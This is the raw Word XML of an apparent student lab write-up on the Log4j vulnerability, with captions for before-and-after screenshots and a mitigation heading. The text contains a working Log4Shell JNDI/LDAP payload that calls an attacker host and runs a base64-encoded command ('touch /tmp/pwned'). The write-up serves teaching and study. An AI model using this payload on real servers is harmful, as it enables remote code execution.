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1874F" w14:textId="5AEA424A" w:rsidR="00D70CB5" w:rsidRDefault="00D31478">
      <w:r>
        <w:t>Derek McPeak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDF1D7" w14:textId="327C334D" w:rsidR="00515D8E" w:rsidRDefault="00515D8E"/>
    <w:p w14:paraId="10D50F6B" w14:textId="21F263BA" w:rsidR="00D31478" w:rsidRDefault="00D31478">
      <w:r>
        <w:t>Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDE0A3" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF5E27F" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF468F1" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4400A848" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC0D03C" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597F3197" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761BD118" w14:textId="6ED09B5C" w:rsidR="006D441F" w:rsidRDefault="00D31478" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The log4j attack utilizes javas naming and directory API, especially the directory. LDAP (Light-weight directory protocol) and in Apache Log4j, versions previous to 2.15, a feature called JNDI look ups, and arbitrary code execution. The JNDI isn’t meant to execute code but to provide data. The attack provided </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>://192.168.0.15:1389</w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=} calls for the JNDI look up to start listening to the attackers IP, then passes the attack “/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo”. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Which “</w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dG91Y2ggL3RtcC9wd25lZAo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">” translated from </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is “touch /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is an attack in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> system to create a file in the temp folder called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E51CF8" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="006D441F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1A4D6786" w14:textId="26892F30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77E3FE0E" w14:textId="77777777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00CE7F81" w14:textId="0CFE3801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04C8C236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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Log 4j vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF3AB8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C987A72" wp14:editId="609E5DF3">
            <wp:extent cx="5553075" cy="16954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5D4D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</w:p>
    <w:p w14:paraId="1E643ADD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</w:p>
    <w:p w14:paraId="0632F107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</w:rPr>
        <w:t>Log4j Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B554A9E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6871AC1" wp14:editId="781A3208">
            <wp:extent cx="5943600" cy="3200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8EA0" w14:textId="77777777" w:rsidR="006D441F" w:rsidRPr="00727B27" w:rsidRDefault="006D441F" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB7446D" w14:textId="77777777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6AE88FD0" w14:textId="3A70D5E0" w:rsidR="00D31478" w:rsidRDefault="00D31478"/>
    <w:p w14:paraId="15C9D582" w14:textId="7B109B9D" w:rsidR="00F65324" w:rsidRDefault="00F65324"/>
    <w:p w14:paraId="472EC980" w14:textId="42CCF7F7" w:rsidR="00F65324" w:rsidRDefault="005142CA">
      <w:r>
        <w:t xml:space="preserve">File contents of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder before the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C519EA3" w14:textId="5AB077CE" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677E8085" wp14:editId="7E4261F3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7C46" w14:textId="77777777" w:rsidR="005142CA" w:rsidRDefault="005142CA"/>
    <w:p w14:paraId="5CD0AAA8" w14:textId="77777777" w:rsidR="005142CA" w:rsidRDefault="005142CA"/>
    <w:p w14:paraId="3EF0F10E" w14:textId="065A9E7C" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:r>
        <w:t>The attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6B689" w14:textId="7E8B17C3" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58772329" wp14:editId="3E1ABB1E">
            <wp:extent cx="5943600" cy="333756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A101" w14:textId="50E3161F" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:r>
        <w:t>The file added from the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D48CE9" w14:textId="03930EB1" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34F569C9" wp14:editId="5BA3AA42">
            <wp:extent cx="5943600" cy="3736340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 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78"/>
    <w:rsid w:val="005142CA"/>
    <w:rsid w:val="00515D8E"/>
    <w:rsid w:val="006D441F"/>
    <w:rsid w:val="009D58AF"/>
    <w:rsid w:val="00A340BF"/>
    <w:rsid w:val="00D31478"/>
    <w:rsid w:val="00F6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E339B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5E954FF-2B94-4F86-B510-58446858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McPeak, Derek (dmcpeak2@student.cccs.edu)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>McPeak, Derek (dmcpeak2@student.cccs.edu)</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-28T18:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-28T22:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>